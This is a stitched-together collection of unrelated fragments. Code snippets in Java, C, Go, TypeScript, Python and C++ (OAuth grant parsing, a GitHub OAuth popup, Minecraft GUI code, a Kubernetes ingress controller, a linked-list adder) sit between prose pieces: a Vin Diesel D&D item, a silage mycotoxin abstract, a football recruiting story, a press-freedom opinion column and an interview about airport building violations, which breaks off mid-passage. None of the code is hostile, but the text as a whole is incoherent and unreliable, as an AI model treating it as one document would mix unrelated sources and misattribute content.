        if (!"oauth_2_0".equalsIgnoreCase(getName())) {
            return Collections.emptyList();
        }
        TypeInstance structuredValue = this.securitySchemeRef.structuredValue();
        if (structuredValue == null) {
            return Collections.emptyList();
        }
        List<String> authorizationGrants = new ArrayList<>();
        List<TypeInstanceProperty> properties = structuredValue.properties();
        for (TypeInstanceProperty property : properties) {
            // NOTE(review): each matching property contributes a single
            // stringified value; confirm multi-valued grants are not
            // expected here (property.value() looks scalar).
            if ("authorizationGrants".equalsIgnoreCase(property.name())) {
                authorizationGrants.add(property.value().value().toString());
            }
        }
        return authorizationGrants;
    }
}
<reponame>vasanthrajd/rajehs-vasanth<filename>src/main/java/com/careerin/api/dto/RefreshTokenDto.java
package com.careerin.api.dto;
import lombok.Getter;
import lombok.Setter;
import java.io.Serializable;
/**
 * Transport object carrying a refresh token in API requests/responses.
 * Getters/setters are generated by Lombok.
 */
@Getter
@Setter
public class RefreshTokenDto implements Serializable {
	private static final long serialVersionUID = 9052178978317125554L;
	// The opaque refresh token string issued to the client.
	private String refreshToken;
}
|
Geek & Sundry teamed up with Nerdist to bring Vin Diesel's dream of an awesome Dungeons & Dragons session to life. Laura Bailey, Matt Mercer and Travis Willingham from Critical Role joined forces with Vin Diesel and minds from the Nerdist to film a special session...
You can watch the session above, where Vin's own Witch Hunter class joins forces with his companions to try and find out the root of a terrible blight in a small township. See how they manage to take on threats and 'knock' their way into a world of adventure.
It's great to see Vin having fun with some old school tabletop role-playing again. He used to play when he was younger as a Half-Orc Barbarian. Whether or not he gets much time to play regularly nowadays when he's a Hollywood big shot; here's hoping he makes time now.
What do you think? |
Mycophenolic Acid in Silage
ABSTRACT We examined 233 silage samples and found that molds were present in 206 samples with counts between 1 × 103 and 8.9 × 107 (mean, 4.7 × 106) CFU/g. Mycophenolic acid, a metabolite of Penicillium roqueforti, was detected by liquid chromatography-mass spectrometry in 74 (32%) of these samples at levels ranging from 20 to 35,000 (mean, 1,400) μg/kg. This compound has well-known immunosuppressive properties, so feeding with contaminated silage may promote the development of infectious diseases in livestock. |
<filename>minecraft/net/minecraft/client/AnvilConverterException.java
package net.minecraft.client;

/**
 * Thrown when converting a world save to/from the Anvil format fails.
 */
public class AnvilConverterException extends Exception {
    /**
     * @param exceptionMessage human-readable description of the conversion failure
     */
    public AnvilConverterException(String exceptionMessage) {
        super(exceptionMessage);
    }
}
|
Building Collaboration: A Scoping Review of Cultural Competency and Safety Education and Training for Healthcare Students and Professionals in Canada
ABSTRACT Phenomenon: This scoping literature review summarizes current Canadian health science education and training aimed to lessen health gaps between Aboriginal and non-Aboriginal peoples. Approach: Keyword searches of peer-reviewed and gray literature databases, websites, and resources recommended by local Aboriginal community members identified 1,754 resources. Using specific inclusion and exclusion criteria, 26 resources relevant to education and training of healthcare professionals and students in Canada were selected. Information included self-assessment for cultural competency/safety skills, advocacy within Canadian healthcare, and descriptions of current programs and training approaches. Findings: In spite of increasing awareness and use of cultural competency and safety concepts, few programs have been successfully implemented. Insights: A concerted effort among health science education and training bodies to develop integrated and effective programs could result in comprehensive processes that hasten the Canadian culturally safe healthcare provision, thus reducing the gaps among populations. |
#include <stdio.h>
#include <stdlib.h> /* fixed: <stdlib.io> is not a standard header */
#include <string.h>
#include <avr/io.h>
#include <avr/interrupt.h>
#include <avr/wdt.h>

/*
 * Compute the 15-bit packet error code (PEC) over `data`.
 * NOTE(review): looks like the LTC68xx-style CRC15 — confirm the
 * polynomial/table against the implementation in the .c file.
 */
uint16_t pec15_calc(uint8_t len, //Number of bytes that will be used to calculate a PEC
uint8_t *data //Array of data that will be used to calculate a PEC
);
|
<reponame>ramarag/cosmos-explorer
import postRobot from "post-robot";
// Payload relayed back to the window that opened this OAuth popup.
export interface IGitHubConnectorParams {
  state: string;
  code: string;
}
export const GitHubConnectorMsgType = "GitHubConnectorMsgType";
// This page is the GitHub OAuth redirect target, loaded in a popup. On
// load it forwards the `state` and `code` query parameters to the opener
// window (same-origin only) and then closes itself.
window.addEventListener("load", async () => {
  const openerWindow = window.opener;
  if (openerWindow) {
    const params = new URLSearchParams(document.location.search);
    await postRobot.send(
      openerWindow,
      GitHubConnectorMsgType,
      {
        state: params.get("state"),
        code: params.get("code"),
      } as IGitHubConnectorParams,
      {
        // Restrict delivery to windows on our own origin.
        domain: window.location.origin,
      }
    );
    window.close();
  }
});
|
/**
 * Dispense the specified stack, play the dispense sound and spawn particles.
 *
 * Scans the block directly in front of the dispenser for living horse-like
 * entities and equips the first tame one that accepts this stack as armor;
 * otherwise falls back to the default dispense behavior.
 * NOTE(review): func_230276_fq_/func_230277_fr_ are obfuscated names that
 * appear to gate "can wear armor" / "already wearing armor" -- unverified
 * mapping.
 */
protected ItemStack dispenseStack(IBlockSource source, ItemStack stack) {
   // Position one block ahead of the dispenser's facing direction.
   BlockPos blockpos = source.getBlockPos().offset(source.getBlockState().get(DispenserBlock.FACING));
   for(AbstractHorseEntity abstracthorseentity : source.getWorld().getEntitiesWithinAABB(AbstractHorseEntity.class, new AxisAlignedBB(blockpos), (p_239790_0_) -> {
      return p_239790_0_.isAlive() && p_239790_0_.func_230276_fq_();
   })) {
      if (abstracthorseentity.isArmor(stack) && !abstracthorseentity.func_230277_fr_() && abstracthorseentity.isTame()) {
         // split(1) consumes exactly one item; slot 401 is presumably the
         // horse-armor inventory slot -- confirm against the entity class.
         abstracthorseentity.replaceItemInInventory(401, stack.split(1));
         this.func_239796_a_(true);
         return stack;
      }
   }
   return super.dispenseStack(source, stack);
}
// Advances a new line in the decoder
// And calls the next stateFunc
// checks if next line is continuation line
func (d *decoder) next() {
if d.buffered == "" {
res := d.scanner.Scan()
if true != res {
d.err = d.scanner.Err()
return
}
d.line++
d.current = d.scanner.Text()
} else {
d.current = d.buffered
d.buffered = ""
}
for d.scanner.Scan() {
d.line++
line := d.scanner.Text()
if strings.HasPrefix(line, " ") || strings.HasPrefix(line, "\t") {
d.current = d.current + line[1:]
} else {
d.buffered = line
break
}
}
d.err = d.scanner.Err()
if d.nextFn != nil {
d.nextFn(d)
}
} |
/**
 * Called when the screen is unloaded. Used to disable keyboard repeat events.
 *
 * Also serializes the edited sign state (tile-entity coordinates, the
 * lastAdded flag and the four sign-text lines) into a custom packet and
 * sends it to the server, so the edit made in this GUI is persisted.
 */
public void onGuiClosed()
{
    Keyboard.enableRepeatEvents(false);
    NetClientHandler netclienthandler = this.mc.getNetHandler();
    if (netclienthandler != null)
    {
        ByteArrayOutputStream streambyte = new ByteArrayOutputStream();
        DataOutputStream stream = new DataOutputStream(streambyte);
        try
        {
            // Payload layout: x, y, z, lastAdded flag, then four UTF lines.
            stream.writeInt(te.xCoord);
            stream.writeInt(te.yCoord);
            stream.writeInt(te.zCoord);
            stream.writeBoolean(te.lastAdded == 1);
            stream.writeUTF(fakeSign.signText[0]);
            stream.writeUTF(fakeSign.signText[1]);
            stream.writeUTF(fakeSign.signText[2]);
            stream.writeUTF(fakeSign.signText[3]);
            stream.close();
            streambyte.close();
            PacketDispatcher.sendPacketToServer(PacketDispatcher.getPacket(CHANNEL_SIGN_UPDATE, streambyte.toByteArray()));
        }
        catch (Exception e)
        {
            // Best-effort send: failures are only logged, never fatal here.
            e.printStackTrace();
        }
    }
}
<reponame>y1j2x34/rikoltilo
import { Shortcut } from '@vgerbot/shortcuts';
import { Observable } from 'rxjs';
/**
 * RxJS operator factory: forwards only those source values that are
 * KeyboardEvents matching the given shortcut key expression.
 * Errors and completion are passed through unchanged.
 */
export function shortcut(shortcutKey: string) {
    const matcher = Shortcut.from(shortcutKey);
    return function shortcutOperatorFunction<T>(source: Observable<T>) {
        return new Observable<T>(subscriber => {
            const forwardMatching = (value: T) => {
                const isMatch =
                    value instanceof KeyboardEvent && matcher.match(value);
                if (isMatch) {
                    subscriber.next(value);
                }
            };
            return source.subscribe(
                forwardMatching,
                error => subscriber.error(error),
                () => subscriber.complete()
            );
        });
    };
}
|
def _two_intersections_for_outer(self, center, radius, points):
    """Build the remaining and overlapping arc regions for a circle that
    intersects the outer circle in exactly two points.

    :param center: center of the intersecting circle
    :param radius: radius of the intersecting circle
    :param points: the two intersection points with the outer circle
    :return: tuple ``(remains, overlap)`` of :class:`ArcsRegion` objects
    """
    # NOTE(review): arc orientations (last boolean of Arch.from_points) and
    # the None placeholder follow ArcsRegion's expected tuple layout --
    # confirm against the Arch/ArcsRegion definitions.
    remains = (
        Arch.from_points(center, points[0], points[1], radius, False),
        Arch.from_points(self._out_center, points[1], points[0], self._out_radius, True),
        None,
        Arch(self._in_center[0], self._in_center[1], self._in_radius, 0, 2*numpy.pi, True))
    overlap = (
        Arch.from_points(self._out_center, points[0], points[1], self._out_radius, True),
        Arch.from_points(center, points[1], points[0], radius, True))
    return ArcsRegion(remains), ArcsRegion(overlap)
// FaissClusteringNewWithParams function as declared in c_api/Clustering_c.h:91
//
// Thin cgo wrapper: converts the Go arguments to their C representations,
// calls faiss_Clustering_new_with_params, and returns its int status code.
func FaissClusteringNewWithParams(pClustering **Faissclustering, d int32, k int32, cp *Faissclusteringparameters) int32 {
	// The "value, cgoAllocsUnknown" pairs are generator boilerplate; no
	// Go-side allocations need to be kept alive for these conversions.
	cpClustering, _ := (**C.FaissClustering)(unsafe.Pointer(pClustering)), cgoAllocsUnknown
	cd, _ := (C.int)(d), cgoAllocsUnknown
	ck, _ := (C.int)(k), cgoAllocsUnknown
	ccp, _ := cp.PassRef()
	__ret := C.faiss_Clustering_new_with_params(cpClustering, cd, ck, ccp)
	__v := (int32)(__ret)
	return __v
}
After getting his first power five conference offer from Wisconsin Saturday, Amherst (WI) High defensive tackle Tyler Biadasz maintained that he wanted to finish his camp circuit before making any college decisions.
That was before he let the emotions of getting an offer from his dream school sink in.
“It sunk in Sunday night,” Biadasz told BadgerNation. “I woke up today and felt like I was ready. I had some questions for Coach (Chryst), and I felt like I was ready. I thought this was the best fit for me. The location is perfect for me and my family. This has been a dream since my freshman year.”
Biadasz becomes the sixth commitment in Wisconsin’s 2016 recruiting class and the third from in-state, joining Grafton defensive end Luke Benzschawel and Menomonee inside linebacker Mason Stokke. Currently unranked by Scout.com, Biadasz held offers from Illinois State, South Dakota State, Southern Illinois and Western Illinois and was getting offers from several FBS schools.
“Paul Chryst was excited,” said Biadasz. “He said that’s awesome and we’re happy to have you. They were excited about me as a football player. We were both excited, so that’s awesome.”
Expected to slot in at nose tackle in Wisconsin’s 3-4 defense, the 6-4, 275-pound prospect is anxious to start improving his game.
“I need to get stronger, faster and technique wise I need to improve,” said Biadasz, who recorded 77 tackles, 10 tackles for a loss, five sacks and three forced fumbles for the Division 5 state runner-up Falcons last season. “I just need to keep doing everything that I’ve been doing since freshman year, getting stronger and faster each year and learning new techniques.” Canceling the rest of the camps he had scheduled, Biadasz plans to use that extra time for a little relaxation and to begin preparations to win his second state championship.
“I want to get back to the weight room, spend some times with my friends and enjoy the summer,” said Biadasz. “I want to get ready for the next football season now, because I don’t have to worry about my decision now. Hopefully we can go back to state for another title.”
.more-stories {margin:20px 0;} .more-stories a{display:block;width:100%; background:#efb900;height: 52px;text-align:center;line-height:44px;color:#202020; text-decoration:none;text-transform:uppercase;font-family:bebas_neue;font-size:20px;position:relative;overflow:hidden;letter-spacing:2px;-webkit-transition:all .15s ease-in;transition:all .2s ease-in;border:3px solid #efb900;}.more-stories a:hover{color:#fff;background:0 0;letter-spacing:3px;background:#121212;border:3px solid #121212;} @media (max-width: 600px) { .more-stories a {height:auto !important;line-height:1.4em;padding:10px;} }
Get the latest recruiting info on our insider board |
<filename>main.go
package main
import (
"context"
"flag"
"fmt"
"os"
"github.com/chanxuehong/log"
"golang.org/x/sync/errgroup"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"kubernetes-ingress-controller/common"
"kubernetes-ingress-controller/logic/server"
"kubernetes-ingress-controller/logic/watcher"
)
var (
Host string
Port, TLSPort int
)
// main wires the ingress controller together: it parses the CLI flags,
// builds an in-cluster Kubernetes client, starts the server and the resource
// watcher concurrently, and blocks until either goroutine fails.
func main() {
	_, ctx, _ := log.FromContextOrNew(context.Background(), nil)
	flag.StringVar(&Host, "host", "0.0.0.0", "the host to bind")
	flag.IntVar(&Port, "port", 80, "the insecure http port")
	// NOTE(review): "tsl-port" looks like a typo for "tls-port"; renaming
	// would break existing invocations, so it is only flagged here.
	flag.IntVar(&TLSPort, "tsl-port", 443, "the secure https port")
	flag.Parse()
	config := common.GetFactory().Config()
	// NOTE(review): printing ctx and config to stdout looks like leftover
	// debug output -- confirm whether it should be removed or logged.
	fmt.Println(ctx, config)
	// Build a rest.Config from the in-cluster token and ca.crt.
	restConfig, err := rest.InClusterConfig()
	if err != nil {
		log.ErrorContext(ctx, "InClusterConfig failed", "error", err.Error())
		os.Exit(1)
	}
	// Create a new Clientset from the restConfig.
	client, err := kubernetes.NewForConfig(restConfig)
	if err != nil {
		log.ErrorContext(ctx, "NewForConfig failed", "error", err.Error())
		os.Exit(1)
	}
	s := server.New()
	// Every payload change observed by the watcher is pushed to the server.
	w := watcher.NewWatcher(client, func(payload *watcher.Payload) {
		s.Update(ctx, payload)
	})
	// Run server and watcher concurrently; Wait returns the first error.
	var eg errgroup.Group
	eg.Go(func() error {
		return s.Run(context.TODO())
	})
	eg.Go(func() error {
		return w.Watcher(context.TODO())
	})
	if err := eg.Wait(); err != nil {
		log.ErrorContext(ctx, "Wait failed", "err", err.Error())
	}
}
|
Reporters and members of the media ask questions at the White House in Washington on May 10. (Jabin Botsford/The Washington Post)
We members of the media probably sound a little self-serving when we complain about constant attacks on press freedom.
Press freedom is a sacred democratic value, enshrined right there in the Constitution! we huff to whoever will listen.
Needless to say, lots of Americans remain unconvinced.
As I noted last week, a recent NPR-PBS NewsHour-Marist poll found that 4 in 10 Republicans believe the United States has too greatly expanded freedom of the press. Since then, an American Press Institute survey found that 6 in 10 Republicans believe news organizations primarily just prevent political leaders from doing their jobs.
Fed a steady diet of media vilification (served up by both left and right), Americans are apparently unmoved by citations of political texts that feel far removed from their daily lives. Maybe, they think, efforts to “open up our libel laws,” dismissals of the lamestream media as “fake news” and even threats of violence against journalists could do the country some good.
To those indifferent to abstract political ideals, let me offer a more practical reason to be alarmed by assaults on media freedom: the fact that the government can, and inevitably will, screw up.
Events over recent weeks suggest that Republicans’ war on the media should not be viewed in isolation. It’s part of a broader strategy to discredit and disempower any independent voice trying, however imperfectly, to hold politicians to account.
Take, for example, the relentless attacks on the Congressional Budget Office, a nonpartisan federal agency created in 1974 precisely so that Congress and the public could rely on technical expertise from independent analysts with no dog in the fight.
The CBO issues dozens of bill scores and reports each year, and no scores have come with higher stakes this year than its assessments of Republicans’ Obamacare repeal plans. Sensing that the news on the Senate’s latest bill would be bad, though, Republicans have been doing everything they can to smear the character, motives and competence of the agency. (Late Monday the bill was struck by what may turn out to be a death blow; two more Republican senators announced their opposition, leaving the legislation with no path to passage, at least in its current form.)
In March, asked about a CBO score forecasting that the House GOP’s health-care bill would cause tens of millions of Americans to lose their insurance, former House speaker and Trump surrogate Newt Gingrich called the federal agency “corrupt” and “dishonest.”
White House officials ramped up their own attacks over subsequent months. This past week the White House criticized the accuracy of the CBO in a video that misspelled the word “inaccurately.” (You can’t make this stuff up.)
(Meg Kelly/The Washington Post)
The last straw came in an op-ed published by The Post over the weekend, when two Trump officials preemptively declared that whatever the nonpartisan Congressional Budget Office reported on the Senate Republicans’ health-care bill, “the CBO’s estimates will be little more than fake news.”
That is, now the CBO is being slurred with the nastiest comparison of all: to the media.
The nation’s independent federal statistical agencies have lately found themselves in similar crosshairs. They have been praised when their numbers reflect favorably upon Republicans but mercilessly attacked when their data show otherwise.
The nonpartisan Office of Government Ethics, the internal watchdog tasked with helping executive-branch officials avoid conflicts of interest, has also been repeatedly and unfairly accused of partisanship under this administration. The neutering of this agency has made it much harder to ensure that federal officials are making decisions in the best interests of the country — an embarrassment at home and abroad.
“I think we are pretty close to a laughingstock at this point,” Walter M. Shaub Jr., the departing head of the agency, told the New York Times over the weekend.
And then there’s the Trump administration’s unrelenting attacks on an independent federal judiciary, the last best hope against government excess and impropriety.
The common message from Trump officials and co-partisans on Capitol Hill through all these actions: Trust us, and us alone. Anyone who contradicts us is spouting #fakenews.
Maybe this plan will buy Republicans some time, but they can’t outrun bad news forever. At some point, presumably, members of the public will notice if they, oh, lose their health insurance. Just because President Trump declares a Russia story or the unemployment rate “fake” doesn’t make it so. |
<reponame>paulwratt/cin-5.34.00
/* -*- C++ -*- */
/*************************************************************************
* Copyright(c) 1995~2005 <NAME> (<EMAIL>)
*
* For the licensing terms see the file COPYING
*
************************************************************************/
// 021220regexp.txt, Philippe
#include <list>
using namespace std;
// Minimal star base class used to exercise CINT dictionary generation.
class BaseStar {
//...
};
// List of pointers to some concrete Star type.
template<class Star> class StarList : public list <Star*> {
//...
};
// Convenience alias for a list of BaseStar pointers.
typedef list<BaseStar*> blist;
#ifdef __CINT__
#pragma link C++ nestedclass;
#pragma link C++ nestedtypedef;
#pragma link C++ class BaseStar;
#pragma link C++ class StarList<BaseStar>;
#pragma link C++ class list<BaseStar*>;
//typedef list<BaseStar*> blist;
#pragma link C++ class blist::iterator;
#pragma link C++ class list<BaseStar*>::iterator;
#endif
#include <stdio.h>
// Prints a success marker so the harness can confirm the dictionary loaded.
void test() {
    puts("success");
}
|
package commands
import (
"log"
"os"
"strings"
config "github.com/Skarlso/go-furnace/config"
fc "github.com/Skarlso/go-furnace/furnace-gcp/config"
"github.com/Yitsushi/go-commander"
"golang.org/x/net/context"
"golang.org/x/oauth2/google"
dm "google.golang.org/api/deploymentmanager/v2"
"google.golang.org/api/googleapi"
)
// Status commands for google Deployment Manager
type Status struct {
}
// Execute runs the status command: it loads an optional config file (first
// CLI argument), looks up the deployment and its manifest in the configured
// GCP project, and logs the deployment's description, name, labels,
// self-link and layout. (Header previously said "create command".)
func (s *Status) Execute(opts *commander.CommandHelper) {
	configName := opts.Arg(0)
	if len(configName) > 0 {
		dir, _ := os.Getwd()
		if err := fc.LoadConfigFileIfExists(dir, configName); err != nil {
			config.HandleFatal(configName, err)
		}
	}
	log.Println("Looking for Deployment under project name: ", keyName(fc.Config.Main.ProjectName))
	deploymentName := fc.Config.Gcp.StackName
	log.Println("Deployment name is: ", keyName(deploymentName))
	ctx := context.Background()
	client, err := google.DefaultClient(ctx, dm.NdevCloudmanScope)
	config.CheckError(err)
	d, _ := dm.New(client)
	project := d.Deployments.Get(fc.Config.Main.ProjectName, deploymentName)
	p, err := project.Do()
	if err != nil {
		// A 404 means the stack simply does not exist; anything else is
		// unexpected. NOTE(review): the unchecked type assertion panics if
		// err is not a *googleapi.Error.
		if err.(*googleapi.Error).Code != 404 {
			config.HandleFatal("error while getting deployment: ", err)
		} else {
			config.HandleFatal("Stack not found!", nil)
		}
	}
	// The manifest field is a URL; keep only its trailing path segment.
	manifestID := p.Manifest[strings.LastIndex(p.Manifest, "/")+1:]
	manifest := d.Manifests.Get(fc.Config.Main.ProjectName, deploymentName, manifestID)
	m, err := manifest.Do()
	config.CheckError(err)
	log.Println("Description: ", p.Description)
	log.Println("Name: ", p.Name)
	log.Println("Labels: ", p.Labels)
	log.Println("Selflink: ", p.SelfLink)
	log.Println("Layout: \n", m.Layout)
	// Consider getting every resource status?
}
// NewStatus creates and wraps the "status" command for the given application.
func NewStatus(appName string) *commander.CommandWrapper {
	descriptor := &commander.CommandDescriptor{
		Name:             "status",
		ShortDescription: "Get the status of an existing Deployment Management group.",
		LongDescription:  `Get the status of an existing Deployment Management group.`,
		Arguments:        "[--config=configFile]",
		Examples:         []string{"status [--config=configFile]"},
	}
	return &commander.CommandWrapper{
		Handler: &Status{},
		Help:    descriptor,
	}
}
|
<filename>src/index.tsx
import { useRef } from 'react'
import ReactDOM from 'react-dom';
import EpubViewer from 'modules/epubViewer/EpubViewer'
import ReactEpubViewer from 'modules/reactViewer/ReactViewer'
import { ViewerRef } from 'types'
// Props for the demo entry point: which of the two viewer implementations
// to mount (defaults to the React-based one).
interface Props {
  VIEWER_TYPE?: "ReactViewer" | "EpubViewer"
}

// Demo application: renders the bundled sample EPUB with the chosen viewer.
const App = ({ VIEWER_TYPE = "ReactViewer" }: Props) => {
  // Path to the sample book served from the app's public assets.
  const EPUB_URL = "/react-epub-viewer/files/Alices Adventures in Wonderland.epub";
  // Imperative handle into the viewer component.
  const ref = useRef<ViewerRef>(null);
  return (
    <>
      {VIEWER_TYPE === "ReactViewer" && <>
        <ReactEpubViewer
          url={EPUB_URL}
          ref={ref}
        />
      </>
      }
      {VIEWER_TYPE === "EpubViewer" && <>
        <EpubViewer
          url={EPUB_URL}
          ref={ref}
        />
      </>
      }
    </>
  );
}

ReactDOM.render(<App />, document.getElementById('root'));
/*******************************************************/
/**
Checks that the parser recognizes incomplete initial segments of a log
record as incomplete. */
static
void
recv_check_incomplete_log_recs(
	byte*	ptr,	/*!< in: start of a complete log record */
	ulint	len)	/*!< in: length of the complete record */
{
	ulint	i;
	byte	type;
	ulint	space;
	ulint	page_no;
	byte*	body;

	/* Every strict prefix of the record (lengths 0..len-1) must fail to
	parse; recv_parse_log_rec() presumably returns 0 when it cannot parse
	a full record, and ut_a() hard-asserts that. */
	for (i = 0; i < len; i++) {
		ut_a(0 == recv_parse_log_rec(ptr, ptr + i, &type, &space,
					     &page_no, &body));
	}
}
/**
* Method hitHist
* returns a histogram of hits on each Ship in the form of an int[5].
* @param boards Any of the Boards
* @return the histogram
*/
public static int[] hitHist (Board boards) {
int[] noHits = new int[5];
for (int i = 0; i < boards.carrier.hits.length; i++) {
if (boards.carrier.hits[i]) noHits[0]++;
}
for (int i = 0; i < boards.battleShip.hits.length; i++) {
if (boards.battleShip.hits[i]) noHits[1]++;
}
for (int i = 0; i < boards.cruiser.hits.length; i++) {
if (boards.cruiser.hits[i]) noHits[2]++;
}
for (int i = 0; i < boards.submarine.hits.length; i++) {
if (boards.submarine.hits[i]) noHits[3]++;
}
for (int i = 0; i < boards.destroyer.hits.length; i++) {
if (boards.destroyer.hits[i]) noHits[4]++;
}
return noHits;
} |
// Somewhat dangerous as it allows reading anywhere in the file: jumps
// straight to `offset` and parses a spectrum from there, overriding the
// scan number with `scNm`. Returns false only for negative offsets.
bool mzpSAXMzmlHandler::readSpectrumFromOffset(f_off offset, int scNm){
	spec->clear();
	m_scanNumOverride=scNm;
	if (offset<0) return false;
	// NOTE(review): parseOffset's own success/failure is not propagated;
	// a bad (but non-negative) offset still yields `true` here.
	parseOffset(offset);
	return true;
}
"""
7 -> 1 -> 6 == 617
5 -> 9 -> 2 == 295
------------------
2 -> 1 -> 9 == 912
"""
from node import Node
def compute_sum(first: Node, second: Node) -> Node:
    """Add two numbers stored as linked lists of digits, least significant
    digit first, and return the head of the result list.

    The digits of ``first`` are updated in place and reused for the result;
    leftover nodes of ``second`` are appended once ``first`` is exhausted.

    :param first: head of the first number (``None`` means no digits)
    :param second: head of the second number (``None`` means no digits)
    :return: head of the sum list; ``None`` only when both inputs are ``None``
    """
    # Make `first` the non-empty operand so the in-place loops always have a
    # node to write into; addition is commutative so swapping is safe.
    # (Previously an empty `first` with a non-empty `second` raised
    # AttributeError on `current.next`.)
    if first is None:
        first, second = second, first
    if first is None:
        return None

    carry = 0
    head = current = first
    # Add digit-by-digit while both lists still have nodes.
    while first and second:
        result = first.val + second.val + carry
        first.val = result % 10
        carry = result // 10
        current = first
        first = first.next
        second = second.next
    # Propagate the carry through the remainder of `first`.
    while first:
        result = first.val + carry
        first.val = result % 10
        carry = result // 10
        current = first
        first = first.next
    # Append (and update in place) the remainder of `second`.
    while second:
        result = second.val + carry
        second.val = result % 10
        carry = result // 10
        current.next = second
        current = current.next
        second = second.next
    # A final carry needs one extra digit node.
    if carry:
        current.next = Node(carry)
    return head
# Smoke tests. Each case is ((first digits, second digits), expected digits),
# all least-significant-digit first; Node.build presumably turns a digit list
# into a linked list and Node.__eq__ compares whole lists.
for use_case, expected_result in [
    (([7, 1, 6], [5, 9, 2]), [2, 1, 9]),  # 617 + 295 = 912
    (([7, 1], [5, 9, 2]), [2, 1, 3]),     # 17 + 295 = 312
    (([9, 9, 9], [1]), [0, 0, 0, 1]),     # 999 + 1 = 1000
    (([9], [1]), [0, 1])                  # 9 + 1 = 10
]:
    first, second = use_case
    result = compute_sum(Node.build(first), Node.build(second))
    expected_result = Node.build(expected_result)
    assert result == expected_result, \
        "{} != {}".format(result, expected_result)
|
def choices(question_id):
    """Create a new answer choice for a question (POST) or render the
    choice-entry form (GET).

    :param question_id: primary key of the parent Question
    """
    question = Question.query.get(question_id)
    if request.method == 'POST':
        choice = request.form.get('choice')
        status = request.form.get('status')
        points = request.form.get('points')
        # Parse the truthiness flag case-insensitively.
        # Fixed: the original compared against 'false ' (trailing space), so
        # "false" never matched, and a missing field crashed on .lower().
        status_text = (status or "").lower()
        if status_text in ("true", "t"):
            status_real = True
        elif status_text in ("false", "f"):
            status_real = False
        else:
            # Fixed: invalid input previously flashed a warning but still
            # saved the choice with a defaulted status; now it re-shows the
            # form without saving.
            flash("Please enter valid input")
            return redirect(url_for('.choices', question_id=question.id, game_id=question.game_id))
        new_choice = Choices(question_id=question.id, choice=choice, status=status_real, points=points)
        db.session.add(new_choice)
        db.session.commit()
        return redirect(url_for('.choices', question_id=question.id, game_id=question.game_id))
    return render_template('choices.html', question_id=question.id, game_id=question.game_id)
/*
 This method resets the stages for the backup process: it clears any
 existing rows in the "stages" table and re-inserts one row per entry
 of the `stages` array.
*/
private void addStages(){
    // Wipe the table only if it already contains rows.
    if(dataHandler.query("select * from stages").length > 0){
        dataHandler.runQuery("delete from stages");
    }
    // NOTE(review): stage names are concatenated into the SQL string. Safe
    // only while `stages` holds trusted, quote-free constants; prefer a
    // parameterized statement if the names can ever vary.
    for(int i = 0; i < stages.length; i++){
        dataHandler.runQuery("insert into stages (stage_name) values ('" + stages[i] + "')");
    }
}
def merge_all_intervals(bed, split=False):
    """Merge overlapping intervals in a BED-like data frame, independently
    for every (strand, seqname) pair.

    :param bed: data frame with at least 'seqname', 'start', 'end',
        'strand' and 'id' columns
    :param split: when True, first split BED12 records into their blocks
    :return: BED6-like data frame of merged intervals; 'merged_ids' lists
        the ids merged into each interval and 'score' counts them
    """
    if split:
        msg = "Splitting the BED12 records"
        logger.debug(msg)
        bed = split_bed12(bed)

    seqnames = bed['seqname'].unique()
    strands = ("+", "-")
    fields = bed6_field_names + ['merged_ids']

    all_matches = []
    for strand in strands:
        m_strand = bed['strand'] == strand
        for seqname in seqnames:
            m_seqname = bed['seqname'] == seqname
            m_filter = m_strand & m_seqname
            if sum(m_filter) == 0:
                continue
            interval_starts = bed.loc[m_filter, 'start']
            interval_ends = bed.loc[m_filter, 'end']
            interval_info = bed.loc[m_filter, 'id']
            merged_intervals = merge_intervals(interval_starts,
                interval_ends, interval_info)
            (merged_starts, merged_ends, merged_info) = merged_intervals
            # Collapse each merged id-group to a ':::'-joined string and
            # keep the group size as the score.
            merged_ids_str = [":::".join(merged_id) for merged_id in merged_info]
            num_merged_ids = [len(merged_id) for merged_id in merged_info]
            df = pd.DataFrame()
            df['start'] = merged_starts
            df['end'] = merged_ends
            df['seqname'] = seqname
            df['strand'] = strand
            df['score'] = num_merged_ids
            df['id'] = merged_ids_str
            df['merged_ids'] = merged_info
            all_matches.append(df)

    # Fixed: pd.concat raises on an empty list, so return an empty frame
    # with the expected columns when no (strand, seqname) pair matched.
    if not all_matches:
        return pd.DataFrame(columns=fields)

    all_matches = pd.concat(all_matches)
    return all_matches[fields]
/**------------------------------------------------------
 * Makes and returns a new event-processing scene-graph
 * modifying thread. This is used for synchronous method
 * calls made by the original event-processing scene-graph
 * thread when it wants to pause the original thread but
 * still keep graphics and animations running. For example
 * it is used for modal dialogs.
 * @return the thread (already started)
 * @see MiPartModifierThread
 *------------------------------------------------------*/
public MiPartModifierThread makeNewRunningThread()
    {
    // Spawn the worker against this object and start it immediately;
    // the caller receives a live, running thread.
    MiPartModifierThread tmp = new MiPartModifierThread(this);
    tmp.start();
    return(tmp);
    }
/**
* Compile a json string into a JsonElement. Note this is required for the test since Gson
* objects cannot be mocked.
*
* @param jsonString string containing serialized json content to parse.
* @return JsonElement for the root of the parsed json.
*/
private JsonElement compileJson(String jsonString) {
JsonParser parser = new JsonParser();
JsonElement result = parser.parse(jsonString);
return result;
} |
Yeshwanth Shenoy's PIL resulted in a court order to demolish 100-plus buildings around Mumbai airport.
In a city where real estate is a premium luxury - either owning a home is a pipe dream, or for those that have, their greatest asset - a Bombay High Court order on Wednesday, asking the Directorate General of Civil Aviation (DGCA) and other agencies to demolish or reduce the height of around 427 buildings in violation of norms, has sent tremors through the residential belt near Mumbai airport. And all this, within the next two months.Petitioner Yeshwanth Shenoy recalls what set him off on this path. "My mission began in 2010, after the Mangalore air crash." On May 22, an Air India Express Flight 812 from Dubai to Mangalore overshot the runway on landing, impacting an illegal structure, after which it caught fire. Of the 160 passengers and six crewmembers on board, only eight survived; it was the third deadliest aviation disaster in India. "That," says Shenoy "was the starting point." From then on, "I dug out documents which proved that lives could have been saved had certain safety norms been met in Mangalore."Shenoy, an Ernakulam (Cochin)-based lawyer, was in Mumbai on Thursday and spoke on why he is interested in the city, the High Court order, permissions and collusions and finally, being a marked man.My vision broadened after my research into the Mangalore crash. I read this paper (mid-day) and followed numerous reports about a developer's building of over 20 meters getting a No Objection Certificate (NOC) despite it being very close to the main airport runway. I filed a PIL. I estimate that there could be at least 8,000 such obstacles within an 11-km radius near the airport.Why should there be a personal motive? A lawyer may fight for his clients, but he also has to look at the bigger picture, the larger good of society. He has a public duty to do so. Suppose a boiler bursts in a chemical factory. A client approaches a lawyer to help him fight for compensation. 
